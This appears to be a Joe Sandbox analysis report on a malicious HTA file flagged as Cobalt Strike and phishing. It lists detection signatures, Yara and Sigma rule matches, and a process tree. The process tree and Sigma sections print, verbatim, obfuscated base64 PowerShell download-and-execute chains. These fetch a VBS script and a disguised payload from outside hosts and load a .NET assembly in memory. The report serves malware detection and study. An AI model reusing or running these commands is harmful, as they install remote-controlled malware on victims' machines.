Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta

Overview

General Information

Sample name:greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
Analysis ID:1564308
MD5:af5174392d590a5b515ab1dcacfc79c6
SHA1:28697fe6ef17f0a714e89505495d60e10b40b8f3
SHA256:a09dc85606cb624d221defe49d7df873af0064acb6e81d14ba646c1aa38936ee
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6848 cmdline: mshta.exe "C:\Users\user\Desktop\greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 6248 cmdline: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 2188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 4228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 2044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7064INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x47c9:$b3: ::UTF8.GetString(
    • 0x5131:$b3: ::UTF8.GetString(
    • 0x5c9d:$b3: ::UTF8.GetString(
    • 0x6c01:$b3: ::UTF8.GetString(
    • 0x226a6:$b3: ::UTF8.GetString(
    • 0x235b6:$b3: ::UTF8.GetString(
    • 0x23f1e:$b3: ::UTF8.GetString(
    • 0x24b2f:$b3: ::UTF8.GetString(
    • 0x3bc3d:$b3: ::UTF8.GetString(
    • 0x59fc0:$b3: ::UTF8.GetString(
    • 0x5a912:$b3: ::UTF8.GetString(
    • 0x5aca7:$b3: ::UTF8.GetString(
    • 0x606ef:$b3: ::UTF8.GetString(
    • 0x60d34:$b3: ::UTF8.GetString(
    • 0x625f1:$b3: ::UTF8.GetString(
    • 0x62d36:$b3: ::UTF8.GetString(
    • 0x636b3:$b3: ::UTF8.GetString(
    • 0x63d7d:$b3: ::UTF8.GetString(
    • 0x72d59:$b3: ::UTF8.GetString(
    • 0x740a9:$b3: ::UTF8.GetString(
    • 0x749fb:$b3: ::UTF8.GetString(
    Process Memory Space: powershell.exe PID: 2492JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 2492INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xdfe0a:$b2: ::FromBase64String(
      • 0x131b68:$b2: ::FromBase64String(
      • 0x1335ca:$b2: ::FromBase64String(
      • 0x133ab3:$b2: ::FromBase64String(
      • 0x1ee2:$b3: ::UTF8.GetString(
      • 0x4680:$b3: ::UTF8.GetString(
      • 0x57df3:$b3: ::UTF8.GetString(
      • 0x584ab:$b3: ::UTF8.GetString(
      • 0x77b93:$b3: ::UTF8.GetString(
      • 0x7824b:$b3: ::UTF8.GetString(
      • 0x92779:$b3: ::UTF8.GetString(
      • 0x92e38:$b3: ::UTF8.GetString(
      • 0x9375f:$b3: ::UTF8.GetString(
      • 0x93fe9:$b3: ::UTF8.GetString(
      • 0x9ba58:$b3: ::UTF8.GetString(
      • 0x9c110:$b3: ::UTF8.GetString(
      • 0x9e310:$b3: ::UTF8.GetString(
      • 0xbab00:$b3: ::UTF8.GetString(
      • 0xde130:$b3: ::UTF8.GetString(
      • 0xdfc11:$b3: ::UTF8.GetString(
      • 0xe3598:$b3: ::UTF8.GetString(

      Other

      SourceRuleDescriptionAuthorStrings
      amsi32_6248.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
        amsi32_2492.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Base64 Encoded PowerShell Command Detected
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6
          Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
          Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
          Sigma detected: Potential PowerShell Command Line Obfuscation
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = 